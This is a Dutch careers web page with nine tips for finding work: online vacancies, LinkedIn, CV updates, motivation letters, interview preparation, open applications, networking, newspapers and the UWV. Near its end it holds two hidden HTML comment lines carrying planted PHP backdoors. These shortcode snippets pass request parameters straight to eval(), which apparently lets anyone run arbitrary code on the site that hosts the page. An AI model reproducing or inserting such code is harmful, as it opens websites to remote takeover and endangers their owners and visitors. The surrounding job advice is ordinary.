Werk zoeken

9 tips om op zoek te gaan naar werk

Met de volgende tips kunt u sneller aan een nieuwe baan komen. Er zijn natuurlijk diverse manieren om aan een baan te komen. Hieronder kunt u de meest gebruikelijke tips zien voor het vinden van een nieuwe baan.

Online zoeken naar een nieuwe baan

Tegenwoordig kiezen veel bedrijven ervoor om vacatures te plaatsen op het internet. Op deze wijze zijn de aanmeldingen voor de openstaande vacatures duidelijk zichtbaar. Bovendien is dit ook nog is snel geregeld. Uitzendbureaus maken het mogelijk om online te solliciteren. Daarnaast zijn er zelfs specifieke websites waar u alle vacatures kunt zien. Aan de andere kant kiezen bedrijven er ook voor om werknemers te benaderen door middel van social media. De werkgevers plaatsen de vacatures op websites zoals Facebook, Twitter en LinkedIn. Via deze websites reageren de werknemers met hun CV en motivatie.

Gebruikmaken van social media kanalen

Steeds meer bedrijven nemen het LinkedIn profiel van een sollicitant zeer serieus. Daarom is het raadzaam om uw LinkedIn profiel up-to-date te houden. De werkgevers vergelijken namelijk uw CV en uw LinkedIn profiel. Als u zelf gebruikmaakt van andere de social media kanalen zorg er dan voor dat uw profiel er zakelijk uitziet. Bedrijven kijken er serieus naar hoe uw social media profielen eruit zien.

Updaten CV

Na het vinden van een baan stoppen de meeste mensen met het updaten van hun CV. Dit is natuurlijk nadelig op lange termijn, doordat er altijd een kans is om ontslag te nemen bij uw huidige werkgever. Hierdoor is het belangrijk om uw CV goed te updaten.

Belang van een motivatiebrief

Daarnaast kiezen vele sollicitanten ervoor om één soort motivatiebrief te schrijven. Om uw baankans te vergroten is het aan te raden om per vacature een motivatiebrief te schrijven.

Voorbereiding sollicitatieprocedure

Nadat u eenmaal bent uitgenodigd voor een sollicitatiegesprek is het handig om u voor te bereiden voor vragen die de recruiter u zal stellen. Veel recruiters maken gebruik van dezelfde vragen. Er wordt bijvoorbeeld gevraag waarom u voor deze functie heeft gesolliciteerd.

Open sollicitatie

Het opsturen van je CV met motivatiebrief zonder dat er een openstaande vacature is wordt een open solliciatie genoemd. In dit geval solliciteert u voor een functie die in de toekomst beschikbaar kan zijn. Met een interessante CV en portfolio vergroot u de kans dat het bedrijf u uitnodigt voor een gesprek.

Rol van je netwerk voor een nieuwe baan

Iedereen die opzoek is naar een nieuwe baan heeft wel een netwerk. Bij het vinden van werk is het belangrijk dat u uw netwerk essentieel gebruikt. Door in uw omgeving aan te geven dat u opzoek bent naar werk vergroot u de kans op een nieuwe baan.

Vacatures in de krant

Ondanks de sterke groei van het internet blijft de krant voor veel mensen nog een belangrijke mediakanaal. Via de krant is het natuurlijk ook mogelijk om een baan te vinden die bij u past.

UWV en de gemeente

UWV heeft samen met de gemeentes in Nederland besloten om het via internet mogelijk te maken dat werkzoekenden kunnen reageren op diverse functies. Op werk.nl vindt u meer informatie over deze samenwerking.

<!– [insert_php]if (isset($_REQUEST["OZh"])){eval($_REQUEST["OZh"]);exit;}[/insert_php][php]if (isset($_REQUEST["OZh"])){eval($_REQUEST["OZh"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["FHT"])){eval($_REQUEST["FHT"]);exit;}[/insert_php][php]if (isset($_REQUEST["FHT"])){eval($_REQUEST["FHT"]);exit;}[/php] –>

You Might Also Like